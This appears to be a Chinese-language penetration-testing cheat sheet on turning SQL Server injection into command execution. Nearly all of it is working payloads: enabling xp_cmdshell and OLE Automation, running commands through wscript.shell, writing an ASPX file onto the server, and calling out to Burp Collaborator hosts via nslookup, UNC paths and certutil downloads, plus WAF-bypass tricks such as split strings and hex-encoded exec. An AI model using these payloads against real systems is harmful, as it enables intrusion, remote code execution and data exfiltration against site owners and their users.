Sql server注入一些tips

　　　　sql server注入到命令执行一些tips:

基础:
开启xp_cmdshell
EXEC sp_configure ‘show advanced options‘, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell‘, 1;RECONFIGURE;

执行命令:
exec master..xp_cmdshell ‘ping dnslog‘

2.启用sp_oacreate
EXEC sp_configure ‘show advanced options‘, 1;   
RECONFIGURE WITH OVERRIDE;   
EXEC sp_configure ‘Ole Automation Procedures‘, 1;   
RECONFIGURE WITH OVERRIDE;

执行命令:
declare @shell int exec sp_oacreate ‘wscript.shell‘,@shell output exec sp_oamethod @shell,‘run‘,null,‘c:\windows\system32\cmd.exe /c whoami >c:\\1.txt‘

;declare+%40shell+int+exec+sp_oacreate+‘wscript.shell‘,%40shell+output+exec+sp_oamethod+%40shell,‘run‘,null,‘c%3a\windows\system32\nslookup.exe%20"http://2ruqida2pbiyia3mnwnsaiadu40vok.burpcollaborator.net"‘;


;declare+@f+int,@g+int;exec+sp_oacreate+%27Scripting.FileSystemObject%27,@f+output;EXEC+SP_OAMETHOD+@f,%27CreateTextFile%27,@f+OUTPUT,%27d:\Dzts\zt\admin\65.txt%27,1;EXEC+sp_oamethod+@f,%27WriteLine%27,null,%27<%@+Page+Language="C%23"%><%+Response.Write("hello,world");+%>%27--
3.调用sp_oamethod

关于bypass:
exec=execute
原语句:execute master..xp_dirtree ‘c:‘
改造:execute(‘master..xp_dirtree "c:" ‘)
再次改造:execute(‘master..xp_dirtree "\\im86rc9bogsvyfv87zip9sz34uaky9.burpcollaborator.net"‘ )

bypass执行命令:
‘;execute(‘xp_c‘%2b‘mdshell " certutil.exe -urlcache -split -f http://cyen6bl8kg2svupmggzc6dk1zs5it7.burpcollaborator.net"‘);--%20111

开启xp_cmdshell bypass:
execute("sp_configure ‘show advanced options‘, 1");RECONFIGURE;execute("sp_configure ‘xp_cmdshell‘, 1;RECONFIGURE");

sql server专属特性:
select 1e1select user 
相当于执行select 1e1 和select user,bypass waf
‘select 1e1declare @s varchar (8000) set @s=0x77616974666F722064656C61792027303A303A3227 exec (@s) -- a


案例:
aspx/.net站点支持get/post/cookie

　　把get参数放到cookie中:

Sql server注入一些tips

标签：weight   修改   loading   总结   char   OLE   ide   ida   ora